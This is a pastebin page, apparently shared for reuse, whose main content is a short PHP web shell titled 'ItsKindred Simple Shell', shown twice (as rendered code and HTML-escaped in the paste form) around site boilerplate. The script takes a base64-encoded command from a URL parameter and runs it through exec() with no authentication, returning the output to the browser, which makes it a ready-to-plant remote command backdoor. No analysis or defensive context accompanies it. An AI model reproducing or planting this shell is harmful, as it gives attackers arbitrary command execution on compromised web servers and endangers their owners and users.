ItsKindred Simple Shell

From Jawnax.org, 1 Year ago, written in PHP.

Embed

Download Paste or View Raw
Hits: 172

<title>PHP Web Shell</title>

<html>

<body>



<script>

window.onload = function() {

document.getElementById('execute_form').onsubmit = function () {

var command = document.getElementById('cmd');

command.value = window.btoa(command.value);

};

};

</script>



<form id="execute_form" autocomplete="off">

<b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px" />

<input type="submit" value="Execute" />

</form>



<?php

$decoded_command = base64_decode($_GET['id']);

echo "<b>Executed:</b> $decoded_command";

echo str_repeat("<br>",2);

echo "<b>Output:</b>";

echo str_repeat("<br>",2);

exec($decoded_command . " 2>&1", $output, $return_status);

if (isset($return_status)):

if ($return_status !== 0):

echo "<font color='red'>Error in Code Execution --> </font>";

foreach ($output as &$line) {

echo "$line <br>";

};

elseif ($return_status == 0 && empty($output)):

echo "<font color='green'>Command ran successfully, but does not have any output.</font>";

else:

foreach ($output as &$line) {

echo "$line <br>";

};

endif;

endif;

?>

</body>

</html>

Author

Title

Language

Your paste - Paste your paste here

&lt;title&gt;PHP Web Shell&lt;/title&gt;
&lt;html&gt;
&lt;body&gt;
    &lt;!-- Replaces command with Base64-encoded Data --&gt;
    &lt;script&gt;
    window.onload = function() {
        document.getElementById('execute_form').onsubmit = function () {
            var command = document.getElementById('cmd');
            command.value = window.btoa(command.value);
        };
    };
    &lt;/script&gt;
    
    &lt;!-- HTML Form for inputting desired command --&gt;
    &lt;form id=&quot;execute_form&quot; autocomplete=&quot;off&quot;&gt;
        &lt;b&gt;Command&lt;/b&gt;&lt;input type=&quot;text&quot; name=&quot;id&quot; id=&quot;id&quot; autofocus=&quot;autofocus&quot; style=&quot;width: 500px&quot; /&gt;
        &lt;input type=&quot;submit&quot; value=&quot;Execute&quot; /&gt;
    &lt;/form&gt;
    
    &lt;!-- PHP code that executes command and outputs cleanly --&gt;
    &lt;?php
        $decoded_command = base64_decode($_GET['id']);
        echo &quot;&lt;b&gt;Executed:&lt;/b&gt;  $decoded_command&quot;;
        echo str_repeat(&quot;&lt;br&gt;&quot;,2);
        echo &quot;&lt;b&gt;Output:&lt;/b&gt;&quot;;
        echo str_repeat(&quot;&lt;br&gt;&quot;,2);
        exec($decoded_command . &quot; 2&gt;&amp;1&quot;, $output, $return_status);
        if (isset($return_status)):
            if ($return_status !== 0):
                echo &quot;&lt;font color='red'&gt;Error in Code Execution --&gt;  &lt;/font&gt;&quot;;
                foreach ($output as &amp;$line) {
                    echo &quot;$line &lt;br&gt;&quot;;
                };
            elseif ($return_status == 0 &amp;&amp; empty($output)):
                echo &quot;&lt;font color='green'&gt;Command ran successfully, but does not have any output.&lt;/font&gt;&quot;;
            else:
                foreach ($output as &amp;$line) {
                    echo &quot;$line &lt;br&gt;&quot;;
                };
            endif;
        endif;
    ?&gt;
&lt;/body&gt;
&lt;/html&gt;

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

Spam protection -

{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}

ItsKindred Simple Shell

Reply to "ItsKindred Simple Shell"